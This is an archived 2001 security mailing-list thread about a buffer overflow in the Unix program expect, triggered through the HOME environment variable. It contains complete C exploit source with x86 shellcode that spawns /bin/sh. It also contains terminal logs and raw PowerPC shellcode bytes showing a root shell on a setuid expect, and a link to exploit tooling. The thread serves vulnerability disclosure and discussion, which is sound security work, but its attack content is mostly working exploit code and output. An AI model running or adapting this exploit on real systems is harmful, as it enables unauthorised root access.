F*#! i sent the wrong paste (lol)... yes the easiest expect exploit if it was suid would be to call it directly... ;-) here is the paste i meant to send [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512 [ Buffer size: 512 Egg size: 2048 Aligment: 0] [ Address: 0x100111f8 Offset: 0 ] sh-2.05$ export HOME=$EGG sh-2.05$ id uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio) sh-2.05$ /usr/bin/expect sh-2.05# id uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio) sh-2.05# ps PID TTY TIME CMD 1791 pts/5 00:00:00 sh 1793 pts/5 00:00:00 ps sh-2.05# exit sh-2.05$ echo $HOME ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2x/?ÿA¼|h¦°Ãÿµ°Ãÿ°Ãÿ?ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx8?ð8¦ô8æó|¥"x|ç"x|?:|Ä®|Ä*|ç(P|?*|¤"|¤*|(P|e|cxDÿÿ|£+x|À3x|Æ2x|§:|¥*|c!.|f"|Å!.|¥*xDÿÿ|à;xDÿÿÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2xKÿþý/bin/shZÿÿÿÿÿÿÿÿ Assigning the contents of $EGG to $HOME being the key... sorry folks about the earlier blunder... ;-) Best Regards, Charles Stevenson Charles Stevenson wrote: > Kevin, > > Here's the PPC shellcode info you asked for: > > This is mainly a post of my PowerPC exploit efforts... anyways... Just > for grins I tested a scenario under Debian PowerPC GNU/Linux with: > > ii expect5.31 5.31.8-3 A program that "talks" to other > programs. > > [-(core@euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect > > [-(core@euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect > -rwsr-xr-x 1 root root 4328 Sep 20 2000 /usr/bin/expect > [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512 > [ Buffer size: 512 Egg size: 2048 Aligment: > 0] > [ Address: 0x100111f8 Offset: 0 > ] > sh-2.05$ id > uid=1000(core) gid=1000(core) > groups=1000(core),4(adm),24(cdrom),29(audio) > sh-2.05$ /usr/bin/expect > expect1.1> id > uid=1000(core) gid=1000(core) euid=0(root) > groups=1000(core),4(adm),24(cdrom),29(audio) > expect1.2> > > If you find a program that calls expect suid let me know ;-) > > Best Regards, > Charles Stevenson > > P.S. the "reet" tools I wrote to add PowerPC support are based on Aleph > One's smashstack code. It's available at: > http://www.ezlink.com/~core/files/reet.tar.gz (Comments welcome:) > > > I have found an overflow in and coded the exploit code for several > > versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am > > unable to think of a situation where this would be useful due to the > > fact that expect is not suid...can anyone help me determine if this is > > exploitable to obtain root? Perhaps a suid expect script could be > > exploited? or maybe something like suid kppp which calls expect as a > > helper program? > > > > [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'` > > [root@linux elguapo]# expect > > Segmentation fault (core dumped) > > > > -Kevin Finisterre > > dotslashat_private > > --------------54785D81E19EEAA4D65A5A40 > > Content-Transfer-Encoding: 7bit > > Content-Type: text/plain; charset=us-ascii; > > name="expect.c" > > Content-Disposition: inline; > > filename="expect.c" > > > > //krfinisterreat_private or dotslashat_private > > //this is output from my brute script... > > //722 > > //Stack pointer: 0xbffffa18 > > // Offset: 0x2d3 > > // Return addr: 0xbffff745 > > //stack/brute.sh: line 11: 2190 Illegal instruction (core dumped) > > $3 > > $L > > //723 > > //Stack pointer: 0xbffffa18 > > // Offset: 0x2d4 > > // Return addr: 0xbffff744 > > //sh-2.04# > > //note that I was root when I ran this ... expect is not suid > > > > #define BUFFERSIZE 533 > > > > unsigned long sp(void) > > { > > __asm__("movl %esp, %eax"); > > } > > > > int main(int argc,char **argv) > > { > > char hell[] = > > "\x29\xc0" > > "\x29\xc0" > > "\xb0\x47" > > "\x29\xdb" > > "\xb3\x0c" > > "\x89\xd9" > > "\xcd\x80" > > "\x5e" > > "\x29\xc0" > > "\x88\x46\x07" > > "\x89\x46\x0c" > > "\x89\x76\x08" > > "\xb0\x0b" > > "\x87\xf3" > > "\x8d\x4b\x08" > > "\x8d\x53\x0c" > > "\xcd\x80" > > "\xe8\xe3\xff\xff\xff" > > "\x2f\x62\x69\x6e\x2f\x73\x68"; > > int i; > > int offset; > > long esp; > > long ret; > > long *addr_ptr; > > char *buffer, *ptr; > > offset = atoi(argv[1]); > > esp = sp(); > > ret = esp-offset; > > > > if(!(buffer = malloc(BUFFERSIZE))) > > { > > printf("oops\n"); > > exit(-1); > > } > > > > ptr = buffer; > > addr_ptr = (long *)ptr; > > for (i=0; i<BUFFERSIZE; i+=4) > > *(addr_ptr++) = ret; > > > > for (i=0; i<BUFFERSIZE/2; i++) > > buffer[i] = '\xeb02'; > > > > ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2)); > > for(i=0; i<strlen(hell); i++) > > *(ptr++) = hell[i]; > > > > buffer[BUFFERSIZE-1] = 0; > > > > setenv("HOME", buffer, 1); > > execlp("/usr/bin/expect", 0); > > } > > > > --------------54785D81E19EEAA4D65A5A40--
This archive was generated by hypermail 2b30 : Thu Jun 07 2001 - 22:07:40 PDT